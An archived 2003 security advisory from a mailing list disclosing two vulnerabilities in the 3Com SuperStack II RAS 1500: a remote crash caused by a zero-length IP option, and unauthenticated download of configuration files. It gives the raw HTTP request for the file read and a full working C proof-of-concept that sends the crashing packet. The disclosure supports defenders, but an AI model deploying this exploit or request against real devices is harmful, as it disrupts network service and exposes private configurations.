[VulnWatch] 3com RAS 1500 Remote vulnerabilities.

From: Piotr Chytla (pch@isec.pl)
Date: 03/24/03

  • Next message: Rafael Nuņez: "[VulnWatch] This is the WebDav Exploit ffs"
    Date: Mon, 24 Mar 2003 16:56:21 +0100 (CET)
    From: Piotr Chytla <pch@isec.pl>
    To: bugtraq@securityfocus.com, <vulnwatch@vulnwatch.org>
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Synopsis: 3com RAS 1500 Remote vulnerabilities.
    Product: 3C433279A-US http://www.3com/ras1500
    Version: Firmware X2.0.10

    URL: http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
    Author: Piotr Chytla <pch@isec.pl>
    Date: February 27, 2003

    Issue:
    - ------

     3com SuperStack II Remote Access System 1500 is telco device which
     provides access via BRI-ISDN/Analog to dialin users.
     It contains two remote vulnerabilities, first is Denial Of Service that
     leads to system crash, second can be used to read configuration files.

    Details:
    - -------

    1. Remote Denial of Service

     It is possible to remotely reboot RAS 1500 (Router unit) system by sending
     malformed packet with ip option len field set to zero. This bug can cause
     loosing all switched connections on PRI-ISDN interface.

    2. Configuration file read

     Unauthorized user can read configuration and system files, using web
     interface on RAS 1500 .
     
        GET /download.htm HTTP/1.0
        HTTP/1.0 401 Unauthorized
        WWW-Authenticate: Basic realm="RAS1500"
        Content-Type: text/html
        Server: Allegro-Software-RomPager/2.10
     
        GET /user_settings.cfg HTTP/1.0
        HTTP/1.0 200 OK
        Content-Type: multipart
        Date: Mon, 25 May 1998 00:26:38 GMT
        Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
        Content-Length: 1258
        Server: Allegro-Software-RomPager/2.10
        [..]
        
        content of user_setting.cfg

     RAS 1500 requires HTTP basic authorization only for download.htm file,
     which is download manager for configuration files and system software.
     Unfortunately system images and configuration files are not protected by
     HTTP authorization.

    Impact:
    - -------
     
     Malicious user is able to remotely crash RAS 1500 - Router Unit, this
     cause dropping all switched connections to PRI-ISDN interface.
     Remote attacker can also read and modify RAS configuration when he broke
     access passwords.

    Exploit:
    - --------
    Below is attached a working proof-of-concept exploit for vulnerability no.1.
     
    - ------X<------isec-options.c------X<------
    /*
     * 3com superstack II RAS 1500 remote Denial of Service
     *
     * Piotr Chytla <pch@isec.pl>
     *
     * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
     * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
     *
     * (c) 2003 Copyright by iSEC Security Research
     */
     
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <libnet.h>
    #define OPT_LEN 4
    void usage()
    {
      printf("Args: \n");
      printf("-s [source address]\n");
      printf("-d [destination address]\n");
    }

    int main(int argc,char *argv[])
    {
     char a;
     int sock,r;
     u_long src;
     u_long dst;
     char pktbuf[IP_MAXPACKET];
     char payload[]="ABCDEFGHIJKLMNOPRST";
     u_char options[4];
     struct ipoption ipopt;
     bzero(options,OPT_LEN);
     while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
     {
         switch(a) {
             case 'h' : { usage(); exit(1); }
             case 's' : { src=libnet_name_resolve(optarg,0); break;}
             case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
            }
     }
     sock = libnet_open_raw_sock(IPPROTO_RAW);
     if (sock<0)
     {
     perror("socket");
     exit(1);
     }

     libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
      memcpy(ipopt.ipopt_list, options, OPT_LEN);
      *(ipopt.ipopt_list) = 0xe4;
      *(ipopt.ipopt_list+1) = 0;
      *(ipopt.ipopt_list+1) = 0;
      *(ipopt.ipopt_list+1) = 0;
      r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
      if (r <0)
       {
            libnet_close_raw_sock(sock);
            printf("Error ip options insertion failed\n");
            exit(1);
       }
      r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
      if (r<0)
      {
       libnet_close_raw_sock(sock);
       printf("Error write_ip \n");
       exit(1);
      }
     libnet_close_raw_sock(sock);
     return 0;
    }

    - ------X<------isec-options.c------X<------
     
    - --
    Piotr Chytla
    iSEC Security Research
    http://isec.pl/

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.7 (GNU/Linux)

    iD8DBQE+fylwC+8U3Z5wpu4RAr7MAKDqCSwMeF78nlFiSRATmAmgTyfeHQCg09cg
    kkYmmXxc8sgurfL8XUhGo2s=
    =bAQc
    -----END PGP SIGNATURE-----


  • Next message: Rafael Nuņez: "[VulnWatch] This is the WebDav Exploit ffs"

    Relevant Pages

    • 3com RAS 1500 Remote vulnerabilities.
      ... 3com RAS 1500 Remote vulnerabilities. ... second can be used to read configuration files. ...
      (Bugtraq)
    • Dead dialup connections
      ... There are eight possible Remote IP Addresses at the POP I dial in to. ... the connection to one of the eight RAs will be ... I am looking for suggestions as to what is causing the dead ...
      (comp.dcom.modems)
    • Remote Access Server Only Allows a Single Connection
      ... At work we have a server running W2K server. ... This has Remote Access ... Stop and Restart RAS. ...
      (microsoft.public.win2000.networking)
    • Re: HELP! RAS & DHCP!
      ... If DHCP is leasing IP addresses for RAS, ... be set up to receive remote connections. ...
      (microsoft.public.win2000.ras_routing)
    • Re: [RFC v2] Another approach to IR
      ... configuration files in default cases. ... commands for all of the common devices. ... Now add a small amount of code to MythTV, etc to act on these evdev ... You are making one big wrong assumption that everyone that has a remote ...
      (Linux-Kernel)